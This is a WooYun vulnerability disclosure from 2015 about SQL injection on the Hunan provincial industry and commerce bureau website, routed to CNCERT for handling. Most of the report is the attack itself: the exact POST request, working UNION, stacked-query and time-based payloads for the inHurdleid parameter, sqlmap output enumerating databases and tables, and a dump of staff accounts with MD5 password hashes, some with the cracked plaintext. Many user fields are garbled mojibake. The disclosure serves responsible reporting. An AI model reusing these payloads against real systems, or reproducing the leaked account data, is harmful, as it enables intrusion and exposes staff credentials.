当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156754

漏洞标题:湖南工商局SQL注入泄漏数据库大量信息

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-01 00:44

修复时间:2016-01-18 12:00

公开时间:2016-01-18 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

RT

详细说明:

0x01 漏洞位置
湖南工商行政管理局

http://**.**.**.**/


0x02 漏洞描述

sql注入漏洞---泄漏大量数据库信息

POST注入
0x03 测试请求参数

POST /visit/peopleandgov/a/moreQuestionList?unitecodeIndex=430000 HTTP/1.1
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: JSESSIONID=38F4E74C1FFC190A395DE54C5E743C7A; pgv_pvi=5850027008; pgv_si=s6229789696; pgv_heid=1448640932500.1448640932500.1448640997914.2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
hotkey=1&inHurdleid=-1&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.


0x04 测试工具
sqlmap测试即可

漏洞证明:

0x05

---
Place: POST
Parameter: inHurdleid
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: hotkey=1&inHurdleid=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(101)+CHAR(99)+CHAR(101)+CHAR(113)+CHAR(121)+CHAR(88)+CHAR(78)+CHAR(74)+CHAR(117)+CHAR(119)+CHAR(116)+CHAR(86)+CHAR(114)+CHAR(73)+CHAR(113)+CHAR(101)+CHAR(108)+CHAR(97)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: hotkey=1&inHurdleid=-1'; WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: hotkey=1&inHurdleid=-1' WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
---
[02:44:12] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[02:44:12] [INFO] fetching database names
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
available databases [10]:
[*] BackupDatabase
[*] EnterpriseInfo
[*] master
[*] MicroChatForHnaic
[*] model
[*] msdb
[*] NewHnaicNet
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: NewHnaicNet
[48 tables]
+-----------------------------+
| PRODUCT_CATEGORY |
| inputmark |
| sysdiagrams |
| tbattachment |
| tbblacklist |
| tbboard1 |
| tbcategory |
| tbcmzmmark |
| tbcollect |
| tbdatabase |
| tbddoslog |
| tbelecscreen |
| tbfile |
| tbforeignpeoplequestion |
| tbforeignpeoplequestiontype |
| tbforeignuser |
| tbforeignuser3 |
| tbgovinforpublicity |
| tbgroup |
| tbgroupboard |
| tbgroupcategory |
| tbhnaicknowledge |
| tbhnaicknowledge_sub |
| tbipunit |
| tbjoke |
| tbkeyword |
| tbleader |
| tbmessage |
| tbnetvoter |
| tbnetvoteroption |
| tbnews |
| tboperatlog |
| tbphonebook |
| tbphoto |
| tbplacard |
| tbpublic_interaction_log |
| tbrelationlink |
| tbreply |
| tbspecial |
| tbtopic |
| tbunit |
| tbunitgroup |
| tbuser |
| tbvisitanddirectvideo |
| tbvisitvideoquestion |
| tbworksystem |
| totalvoteforarea |
| vtreeoperate |
+-----------------------------+


0x06 数据

Database: NewHnaicNet
Table: tbuser
[294 entries]
+--------+---------+---------+-------------------+----------------------------------------------+------------------+---------------+----------+------------+--------------------------+-----------+------------+--------------------+----------------------+---------------------+-------------+---------------------+------------------------+----------------+------------------+
| userid | groupid | usersex | username | userpswd | usersign | userociq | userfrom | usericon | useremail | usercharm | userstatus | userresult | authorunit | userregtime | userpostnum | userlogontime | userunitgroup | userexperience | usersafequestion |
+--------+---------+---------+-------------------+----------------------------------------------+------------------+---------------+----------+------------+--------------------------+-----------+------------+--------------------+----------------------+---------------------+-------------+---------------------+------------------------+----------------+------------------+
| 5 | 2 | 鐢 | yanhaobo | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 423432412 | 涓ユ旦娉 | user0.gif | hnaicfzn@**.**.**.** | 0 | 1 | 浣曚竴涓病鏈夎緭 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-07-16 08:46:33 | 0 | 2011-03-03 15:49:30 | 浼佷笟鐩戠潱绠$悊澶 | 0 | 浣曚竴涓病鏈夎緭 |
| 7 | 1 | 鐢 | hnaicfzn | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒gdf | 172375281 | 鍌呭叴姹 | user0.gif | hnaicfzn@**.**.**.** | 35 | 1 | 甯偍鎵惧洖 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-07-16 09:13:44 | 104 | 2013-08-07 10:37:03 | 鍔炲叕瀹 | 438 | 甯偍鎵惧洖 |
| 10 | 2 | 鐢 | hnaicxczx | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 172375281 | hnaicfzn | user0.gif | werwe@**.**.**.** | 2754 | 1 | 甯偍鎵惧洖蹇樿鐨勫瘑鐮侊紒 | 闀挎矙甯傚伐鍟嗚鏀跨鐞嗗眬 | 2010-08-11 10:50:19 | 2 | 2013-09-16 09:30:48 | 鍔炲叕瀹 | 6 | 甯偍鎵惧洖蹇樿鐨勫瘑鐮侊紒 |
| 11 | 4 | 鐢 | qiangguoyue | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 54356346346 | 寮哄浗璺 | user0.gif | qiangguoyue@**.**.**.** | 0 | 1 | 6346343 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 13:08:15 | 0 | 2013-10-15 15:03:06 | 灞€棰嗗 | 0 | 45634634 |
| 12 | 2 | 鐢 | wuzuofa | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 34564634634 | 浼嶄綔娉 | user0.gif | xvgbxcg@**.**.**.** | 0 | 1 | gdfgdg | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 14:34:16 | 0 | 2011-09-07 14:28:51 | 娑堣垂鑰呮潈鐩婁繚鎶ゅ锛2315鐢宠瘔涓炬姤鍔炲叕瀹わ級 | 0 | gdgdg |
| 13 | 2 | 鐢 | kongfanzhe | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 85693142 | 瀛斿嚒鍝 | user0.gif | 324233@**.**.**.** | 20767 | 1 | 6436436456dfg | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 14:35:50 | 8 | 2013-12-23 09:56:18 | 椋熷搧娴侀€氱洃鐫g鐞嗗 | 24 | 64364363464 |
| 14 | 2 | 鐢 | jiangweiguo | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 423235235235 | 姹熷崼鍥 | user0.gif | gdfgdf@**.**.**.** | 0 | 1 | 52345234523 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 14:49:32 | 0 | 2011-11-14 11:25:19 | 缁忔祹淇℃伅涓績 | 0 | 2345234523523 |
| 15 | 2 | 鐢 | zhouxin | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 5345345345 | 鍛ㄦ | user0.gif | hfghgf@**.**.**.** | 53368 | 1 | 5345345 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 15:13:59 | 38 | 2014-10-23 12:46:49 | 鐪佸伐鍟嗗浼 | 114 | 34534534 |
| 16 | 1 | 鐢 | zhuxianguo | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 325523252 | 鏈辫搐鍥 | user0.gif | cnhklfs@**.**.**.** | 5284 | 1 | 杩樻槸娌℃湁 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-18 08:36:11 | 7 | 2014-08-12 11:25:15 | 鐪佸伐鍟嗗眬浼佷笟娉ㄥ唽灞€ | 21 | 娌℃湁 |
| 17 | 2 | 鐢 | libin | 6503687F60C0FC133B36460E54FCC432 | 鐣欎笅涓€鐗囩┖鐧斤紒 | 81784696 | 鏉庢枌 | user0.gif | dianyunnet@**.**.**.** | 0 | 1 | <blank> | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-11-17 11:44:32

修复方案:

过滤关键词

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-04 11:58

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价